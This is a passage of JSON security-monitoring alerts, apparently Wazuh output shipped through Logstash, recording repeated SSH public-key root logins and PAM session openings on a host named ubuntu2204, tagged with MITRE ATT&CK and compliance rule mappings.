16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote 
Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial 
Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 
16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 
SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by 
(uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication 
success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by 